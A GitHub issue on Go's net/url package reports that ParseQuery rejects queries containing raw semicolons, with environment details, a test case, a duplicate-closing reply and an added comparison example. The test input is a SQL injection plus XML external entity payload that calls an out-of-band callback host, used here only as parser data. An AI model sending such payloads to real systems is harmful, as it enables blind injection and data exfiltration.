Issues parsing urls containing semicolons #49683

Closed
jptosso opened this issue Nov 19, 2021 · 1 comment

jptosso commented Nov 19, 2021

What version of Go are you using (go version)?

$ go version
go version go1.17.2 darwin/amd64

Does this issue reproduce with the latest release?

Haven't tried

What operating system and processor architecture are you using (go env)?

go env Output
$ go env
GO111MODULE=""
GOARCH="amd64"
GOBIN=""
GOCACHE="/Users/jptosso/Library/Caches/go-build"
GOENV="/Users/jptosso/Library/Application Support/go/env"
GOEXE=""
GOEXPERIMENT=""
GOFLAGS=""
GOHOSTARCH="amd64"
GOHOSTOS="darwin"
GOINSECURE=""
GOMODCACHE="/Users/jptosso/go/pkg/mod"
GONOPROXY=""
GONOSUMDB=""
GOOS="darwin"
GOPATH="/Users/jptosso/go"
GOPRIVATE=""
GOPROXY="https://proxy.golang.org,direct"
GOROOT="/usr/local/Cellar/go/1.17.2/libexec"
GOSUMDB="sum.golang.org"
GOTMPDIR=""
GOTOOLDIR="/usr/local/Cellar/go/1.17.2/libexec/pkg/tool/darwin_amd64"
GOVCS=""
GOVERSION="go1.17.2"
GCCGO="gccgo"
AR="ar"
CC="clang"
CXX="clang++"
CGO_ENABLED="1"
GOMOD="/dev/null"
CGO_CFLAGS="-g -O2"
CGO_CPPFLAGS=""
CGO_CXXFLAGS="-g -O2"
CGO_FFLAGS="-g -O2"
CGO_LDFLAGS="-g -O2"
PKG_CONFIG="pkg-config"
GOGCCFLAGS="-fPIC -arch x86_64 -m64 -pthread -fno-caret-diagnostics -Qunused-arguments -fmessage-length=0 -fdebug-prefix-map=/var/folders/_r/p6w6znr53cl59s7gnnszz4sm0000gn/T/go-build3105120933=/tmp/go-build -gno-record-gcc-switches -fno-common"

What did you do?

```go
package main

import (
	"net/url"
	"testing"
)

// Reproduction: the query value contains raw ';' characters.
func TestUrlPayloads2(t *testing.T) {
	out := `var=EmptyValue'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % awpsd SYSTEM "http://0cddnr5evws01h2bfzn5zd0cm3sxvrjv7oufi4.example'||'foo.bar/">%awpsd;`
	c, err := url.ParseQuery(out)
	if err != nil {
		t.Error("failed to parse query", err)
	}
	if p, ok := c["var"]; !ok {
		t.Error("Expected var to be in the map, got ", c)
	} else if len(p) != 1 || p[0] != out {
		t.Error("failed to set var")
	}
}
```

Output: invalid semicolon separator in query

What did you expect to see?

I have tried it with many web application frameworks and languages (php, ror, nodejs) and it works as expected:

Array
(
    [var] => EmptyValue'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % awpsd SYSTEM "http://0cddnr5evws01h2bfzn5zd0cm3sxvrjv7oufi4.example'||'foo.bar/">%awpsd;
)

I know golang supports & and ; as separators but I think it should be changed just to & and ignore ;.

What did you see instead?

I get an empty map[string][]string and an error

@seankhliao
Member

Duplicate of #47425
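
An added example, not part of the original issue or of the Go project's code: it compares `url.ParseQuery` on Go 1.17 and later (a pair containing a raw `;` is dropped and an error is returned) with a parser that splits on `&` only, as the issue requests, and with the sender-side alternative of percent-encoding `;`. `ParseAmpOnly`, `unescapeOrRaw`, `RoundTrip` and the sample query are hypothetical names and constructed data.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// Constructed sample (not the payload from the issue): a raw ';' plus a '%'
// that does not begin a valid escape, followed by a well-formed pair.
const sample = `var=a'||(select 1);%zz&page=2`

// unescapeOrRaw decodes s, falling back to the raw text when the escapes are
// invalid, so a malformed value is still visible to the caller.
func unescapeOrRaw(s string) string {
	if d, err := url.QueryUnescape(s); err == nil {
		return d
	}
	return s
}

// ParseAmpOnly (hypothetical helper) treats only '&' as a separator; ';' stays
// part of the key or value.
func ParseAmpOnly(query string) url.Values {
	vals := url.Values{}
	for _, pair := range strings.Split(query, "&") {
		if pair == "" {
			continue
		}
		k, v, _ := strings.Cut(pair, "=")
		vals.Add(unescapeOrRaw(k), unescapeOrRaw(v))
	}
	return vals
}

// RoundTrip (hypothetical helper) shows the sender-side fix: Encode writes ';'
// as %3B, which url.ParseQuery accepts.
func RoundTrip(value string) (string, error) {
	vals, err := url.ParseQuery(url.Values{"var": {value}}.Encode())
	return vals.Get("var"), err
}

func main() {
	std, err := url.ParseQuery(sample) // Go 1.17+: the pair with ';' is dropped
	fmt.Printf("ParseQuery:   %q err=%v\n", std, err)
	fmt.Printf("ParseAmpOnly: %q\n", ParseAmpOnly(sample))
	got, err := RoundTrip(`a;b%c`)
	fmt.Printf("RoundTrip:    %q err=%v\n", got, err)
}
```

`url.ParseQuery` still returns the pairs it could parse alongside the error, so code that ignores the error silently loses the parameter that contained the `;`.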
